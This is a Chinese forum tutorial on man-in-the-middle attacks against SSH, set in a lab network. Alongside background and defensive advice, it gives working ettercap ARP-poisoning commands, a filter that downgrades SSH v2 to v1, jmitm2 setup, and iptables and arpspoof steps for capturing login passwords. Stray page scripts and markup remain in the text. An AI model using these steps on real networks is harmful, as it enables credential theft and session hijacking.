灰鴿子遠(yuǎn)程控制軟件

標(biāo)題: SSH V2的中間人攻擊黑客攻擊方式 MITM攻擊 www.dumiaotech.com [打印本頁(yè)]

作者: admin 時(shí)間: 2012-12-19 21:24
標(biāo)題: SSH V2的中間人攻擊黑客攻擊方式 MITM攻擊 www.dumiaotech.com
SSH V2的中間人攻擊黑客攻擊方式 MITM攻擊 www.dumiaotech.com

中間人攻擊（Man-in-the-MiddleAttack，簡(jiǎn)稱“MITM攻擊”）中間人攻擊很早就成為了黑客常用的一種古老的攻擊手段，并且一直到今天還具有極大的擴(kuò)展空間。

在網(wǎng)絡(luò)安全方面，MITM攻擊的使用是很廣泛的，曾經(jīng)猖獗一時(shí)的SMB會(huì)話劫持、DNS欺騙等技術(shù)都是典型的MITM攻擊手段。在黑客技術(shù)越來(lái)越多的運(yùn)用于以獲取經(jīng)濟(jì)利益為目標(biāo)的情況下時(shí)，MITM攻擊成為對(duì)網(wǎng)銀、網(wǎng)游、網(wǎng)上交易等最有威脅并且最具破壞性的一種攻擊方式。
要防范MITM攻擊，可以將一些機(jī)密信息進(jìn)行加密后再傳輸，這樣即使被“中間人”截取也難以破解，另外，有一些認(rèn)證方式可以檢測(cè)到MITM攻擊。

至于局域網(wǎng)內(nèi)各種各樣的會(huì)話劫持（局域網(wǎng)內(nèi)的代理除外），因?yàn)樗鼈兌家Y(jié)合嗅探以及欺騙技術(shù)在內(nèi)的攻擊手段，必須依靠ARP和MAC做基礎(chǔ)，所以網(wǎng)管應(yīng)該使用交換式網(wǎng)絡(luò)（通過(guò)交換機(jī)傳輸）代替共享式網(wǎng)絡(luò)（通過(guò)集線器傳輸），這可以降低被竊聽的機(jī)率，當(dāng)然這樣并不能根除會(huì)話劫持，還必須使用靜態(tài)ARP、捆綁MAC+IP等方法來(lái)限制欺騙，以及采用認(rèn)證方式的連接等。
但是對(duì)于“代理中間人攻擊”而言，以上方法就難以見(jiàn)效了，因?yàn)榇矸⻊?wù)器本來(lái)就是一個(gè)“中間人”角色，攻擊者不需要進(jìn)行任何欺騙就能讓受害者自己連接上來(lái)，而且代理也不涉及MAC等因素，所以一般的防范措施都不起作用。
除非你是要干壞事，或者IP被屏蔽，或者天生對(duì)網(wǎng)絡(luò)有著恐懼，否則還是不要整天找一堆代理來(lái)隱藏自己了，沒(méi)必要的。常在河邊走，即使遇上做了手腳的代理也難察覺(jué)。

OpensshOpenSSH 是 SSH （Secure SHell）協(xié)議的免費(fèi)開源實(shí)現(xiàn)。SSH協(xié)議族可以用來(lái)進(jìn)行遠(yuǎn)程控制，或在計(jì)算機(jī)之間傳送文件。而實(shí)現(xiàn)此功能的傳統(tǒng)方式，如telnet(終端仿真協(xié)議)、 rcp ftp、 rlogin、rsh都是極為不安全的，并且會(huì)使用明文傳送密碼。OpenSSH提供了服務(wù)端后臺(tái)程序和客戶端工具，用來(lái)加密遠(yuǎn)程控件和文件傳輸過(guò)程的中的數(shù)據(jù)，并由此來(lái)代替原來(lái)的類似服務(wù)。
OpenSSH是使用SSH透過(guò)計(jì)算機(jī)網(wǎng)絡(luò)加密通訊的實(shí)現(xiàn)。它是取代由SSH Communications Security所提供的商用版本的開放源代碼方案。目前OpenSSH是OpenBSD的子計(jì)劃。
OpenSSH常常被誤認(rèn)以為與OpenSSL有關(guān)聯(lián)，但實(shí)際上這兩個(gè)計(jì)劃的有不同的目的，不同的發(fā)展團(tuán)隊(duì)，名稱相近只是因?yàn)閮烧哂型瑯拥能浖l(fā)展目標(biāo)──提供開放源代碼的加密通訊軟件。
OpenSSH 支持 SSH 協(xié)議的版本 1.3、1.5、和 2。自從 OpenSSH 的版本2.9以來(lái)，默認(rèn)的協(xié)議是版本2，該協(xié)議默認(rèn)使用 RSA 鑰匙。de:OpenSSH en:OpenSSH es:OpenSSH fr:OpenSSH it:OpenSSH ja:OpenSSH lv:OpenSSH nl:OpenSSH pl:OpenSSH sv:OpenSSH
低版本的攻擊

例如這個(gè)服務(wù)器的SSH版本
(, 下載次數(shù): 407)
版本很低SSH-1.5-OpenSSH_6.0p1 可以直接ARP不？
啟動(dòng)ETTERCAP 進(jìn)行ARP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

root@Dis9Team:~# ettercap -T -M arp // // -q -i eth5

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth5... (Ethernet)

  eth5 -> 08:00:00:00:00:03          5.5.5.3    255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

登錄SSH

1
2
3
4
5
6
7

<pre>brk $ ssh 5.5.5.6 -p 2222 -1
brk@5.5.5.6<SCRIPT type=text/javascript>
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</SCRIPT>'s password:
Last login: Sat Nov 17 19:30:29 2012 from 5.5.5.1

成功ARP到密碼
(, 下載次數(shù): 437)

SshmitmSshmitm 是Dsniff自帶的一個(gè)具有威脅的工具之一。如果你是在運(yùn)行dnsspoof來(lái)偽造實(shí)際機(jī)器主機(jī)名，那么sshmitm可以重新定向到你的機(jī)器的ssh流量。因?yàn)樗С值絪s1，所以這也是我們需要考慮把ssh升級(jí)到2的原因。
Sshmitm的工作原理主要是dnsspoof工具使我們攔截到達(dá)另一臺(tái)機(jī)器的ssh連接。只需要在端口22上啟動(dòng)Sshmitm(這里我們可以使用-p選項(xiàng)來(lái)改變所使用的端口號(hào))，并設(shè)置它來(lái)中繼達(dá)到真實(shí)主機(jī)的連接。
sshmitm可以對(duì)某個(gè)SSH會(huì)話發(fā)動(dòng)MITM（Monkey-In-The-Middle）攻擊（注意，這里的Monkey是Dsniff包readme文件中的解析，而不是常見(jiàn)的Man，這種區(qū)別實(shí)際上是沒(méi)有“區(qū)別”，也許就是因?yàn)镈sniff以猴子做為其標(biāo)志的原因吧）。
通過(guò)sshmitm，攻擊者可以捕獲某個(gè)SSH會(huì)話的登錄口令，甚至可以“劫持”整個(gè)會(huì)話過(guò)程（攻擊者在其主機(jī)上通過(guò)OpenSSL提供的代碼生成偽造的證書，以欺騙目標(biāo)主機(jī)，使之相信就是有效的通信另一方，結(jié)果是，攻擊者主機(jī)成了SSH安全通道的中轉(zhuǎn)站）。
目前，對(duì)于SSH1，這種MITM攻擊已經(jīng)構(gòu)成了嚴(yán)重的威脅。
MITM并不是一個(gè)新的概念，它是一種對(duì)認(rèn)證及密鑰交換協(xié)議進(jìn)行攻擊的有效手段。通常，在SSH會(huì)話中，服務(wù)器首先會(huì)給客戶端發(fā)送其公鑰，嚴(yán)格來(lái)說(shuō)，這種密鑰的交換和管理應(yīng)該是基于X.509這種公鑰基礎(chǔ)設(shè)施（PKI）的，但因?yàn)镻KI本身的復(fù)雜性導(dǎo)致真正應(yīng)用了這種公鑰管理機(jī)制的服務(wù)器非常少，所以，通常情況下，服務(wù)器只是簡(jiǎn)單的自己生成密鑰對(duì)，并將其中的公鑰發(fā)送給客戶端。
客戶端收到服務(wù)器的公鑰后，必須獨(dú)立驗(yàn)證其有效性。通常，使用SSH的客戶端會(huì)由sysadmin或其它賬號(hào)來(lái)維護(hù)一個(gè)“密鑰/主機(jī)名”的本地?cái)?shù)據(jù)庫(kù)，當(dāng)首次與某個(gè)SSH服務(wù)器建立連接時(shí)，客戶端可能被事先配制成自動(dòng)接受并記錄服務(wù)器公鑰到本地?cái)?shù)據(jù)庫(kù)中，這就導(dǎo)致可能發(fā)生MITM攻擊。其實(shí)，建立加密的安全網(wǎng)絡(luò)都存在一個(gè)基本的問(wèn)題，無(wú)論如何，某種程度上講，加密通道的初始化連接總是建立在一個(gè)存在潛在危險(xiǎn)的網(wǎng)絡(luò)之上的，如果密鑰交換機(jī)制并不健全，或者是根本就被忽略了，那之后建立起來(lái)的加密通道也形同虛設(shè)了。按道理講，SSH之類的協(xié)議本身是沒(méi)有問(wèn)題的，只要嚴(yán)格按照標(biāo)準(zhǔn)來(lái)建立加密及密鑰交換管理機(jī)制（例如PKI），攻擊者是根本不會(huì)有可乘之機(jī)的，可問(wèn)題就在于，許多時(shí)候，為了使用上的方便，“復(fù)雜”的保證技術(shù)就被人們拋之腦后了。
當(dāng)然，一種協(xié)議如果其可用性并不很強(qiáng)，也許本身就是問(wèn)題，現(xiàn)在，SSH2較SSH1已經(jīng)有了較大改進(jìn)。具體來(lái)說(shuō)，在某個(gè)SSH連接建立之初，如果客戶端收到一個(gè)未知的服務(wù)器端公鑰，OpenSSH會(huì)有下列配置處理方式：

自動(dòng)增加該公鑰到本地?cái)?shù)據(jù)庫(kù)；
發(fā)出下面列出的警告消息，并詢問(wèn)用戶是添加該公鑰還是放棄連接；
————————————————————————
– WARNING: HOST IDENTIFICATION HAS CHANGED! –
————————————————————————
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the host-key has just been changed. Please contact your system administrator.
拒絕接受。如果客戶端對(duì)未知公鑰的驗(yàn)證被取消了（或者客戶端配置本身已經(jīng)旁路掉了這個(gè)過(guò)程），或者如果客戶端保存已知主機(jī)CA證書的緩存被“毒害”了，就很有可能導(dǎo)致攻擊者發(fā)起MITM攻擊。從根本上講，要防止MITM方式的攻擊，用戶自身加強(qiáng)安全措施才是關(guān)鍵，例如，密鑰的初始交換也許可以換做其它方式（比如軟盤），嚴(yán)格管理本地的證書列表數(shù)據(jù)庫(kù)，對(duì)于出現(xiàn)的告警提示，應(yīng)該仔細(xì)甄別，防止第三方的欺騙行為。

降級(jí)MITM攻擊

降級(jí)MITM攻擊允許攻擊者迫使客戶端和/或服務(wù)器使用不太安全的協(xié)議或功能集合，這些協(xié)議或者功能是為了向下兼容舊版本的客戶端/服務(wù)器才提供的。有時(shí)，客戶端支持訪問(wèn)包含不同特征或同一特征不同版本的服務(wù)器。這樣，客戶端和服務(wù)器要經(jīng)常協(xié)商應(yīng)該使用何種特征和何種版本的特征。例如，許多Secure Shell（SSH）客戶端同時(shí)支持SSH協(xié)議的 v1版本和v2版本，以及幾種不同的加密密碼。（SSH是一種加密的網(wǎng)絡(luò)協(xié)議，用于連接提供命令行訪問(wèn)方式的計(jì)算機(jī)。）v1版本含有協(xié)議缺陷，允許攻擊者看到客戶端與服務(wù)器交換的正常加密數(shù)據(jù)。
出于這個(gè)原因，大多數(shù)人使用SSH v2版。
然而，由于向下兼容的原因，許多服務(wù)器和客戶端依然支持SSH v1版。利用MITM攻擊，攻擊者可以告知服務(wù)器和客戶端在開始加密前使用易受攻擊的SSH v1協(xié)議。為了阻止此類攻擊，大多數(shù)SSH客戶端和服務(wù)器只能夠設(shè)置成使用SSH v2協(xié)議。一種測(cè)試客戶端是否支持此規(guī)則的簡(jiǎn)單方法，是代理網(wǎng)絡(luò)流量并告知客戶端使用舊版本的協(xié)議。
ETTERCAP的ARP規(guī)則里面有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

<pre>root@Dis9Team:/usr/share/ettercap# cat etter.filter.ssh
############################################################################
#                                                                         #
#  ettercap -- etter.filter -- filter source file                         #
#                                                                         #
#  Copyright (C) ALoR & NaGA                                              #
#                                                                         #
#  This program is free software; you can redistribute it and/or modify #
#  it under the terms of the GNU General Public License as published by #
#  the Free Software Foundation; either version 2 of the License, or    #
#  (at your option) any later version.                                  #
#                                                                         #
############################################################################

##
#
# This filter will substitute the SSH server response from SSH-1.99 to
# SSH-1.51, so if the server supports both ssh1 and ssh2 we will force
# it to use ssh1... <IMG class=wp-smiley alt=;) src=http://www.2cto.com/uploadfile/2012/1219/20121219105154693.gif" height=auto jQuery172042555347942556737="28" old_width="24" old_height="24">
# server response : SSH-2.00 only ssh2 supported
#                      SSH-1.99 both ssh1 and ssh2 supported
#                      SSH-1.51 only ssh1 supported
##

if (ip.proto == TCP) {
if (tcp.src == 22) {
   if ( replace("SSH-1.99", "SSH-1.51") ) {
      msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
   } else {
      if ( search(DATA.data, "SSH-2.00") ) {
         msg("[SSH Filter] Server supports only SSH version 2\n");
      } else {
         if ( search(DATA.data, "SSH-1.51") ) {
            msg("[SSH Filter] Server already supports only version 1\n");
         }
      }
   }
}
}

root@Dis9Team:/usr/share/ettercap#

SSH 1.9是不能被ARP的，只有SSH-1.5，如果能支持1.9 和 1.5，那么吧1.9替換為1.5版本進(jìn)行ARP
2.0版本的攻擊如果是2.0呢？

1
2
3
4

<pre>brk $ nc -vv 5.5.5.6 22
Connection to 5.5.5.6 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_4.6

可以用jmitm進(jìn)行ARP攻擊

1
2
3
4
5

<pre>root@Dis9Team:/pen# wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz
root@Dis9Team:/pen# tar xf jmitm2-0.1.0.tar.gz
root@Dis9Team:/pen# cd jmitm2-0.1.0/
root@Dis9Team:/pen/jmitm2-0.1.0#

需要編輯兩個(gè)文件

1 2	<pre>root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/conf/server.xml

(, 下載次數(shù): 435) 和目標(biāo)主機(jī)

root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/runm.sh發(fā)送數(shù)據(jù)包欺騙網(wǎng)關(guān) 并且轉(zhuǎn)發(fā)端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

<pre>root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
root@Dis9Team:~# iptables -A FORWARD -j ACCEPT
root@Dis9Team:~# arpspoof -i eth5 -t 5.5.5.6 5.5.5.0
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3

當(dāng)對(duì)方鏈接SSH的時(shí)候成功獲得密碼
(, 下載次數(shù): 433)
可以會(huì)出現(xiàn)SSH密匙不對(duì) 如果目標(biāo)已經(jīng)鏈接過(guò)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the DSA key sent by the remote host is
dc:77:1e:b0:1b:a1:7c:71:33:1f:75:32:fe:e5:2e:28.
Please contact your system administrator.
Add correct host key in /home/brk/.ssh/known_hosts to get rid of this message.
Offending DSA key in /home/brk/.ssh/known_hosts:57
remove with: ssh-keygen -f "/home/brk/.ssh/known_hosts" -R 5.5.5.6
DSA host key for 5.5.5.6 has changed and you have requested strict checking.
Host key verification failed.
brk $

不過(guò)這東西的局限性太大！

歡迎光臨灰鴿子遠(yuǎn)程控制軟件 (http://www.dumiaotech.com/)

<center id="gqasq"></center>

<li id="gqasq"></li><code id="gqasq"><delect id="gqasq"></delect></code>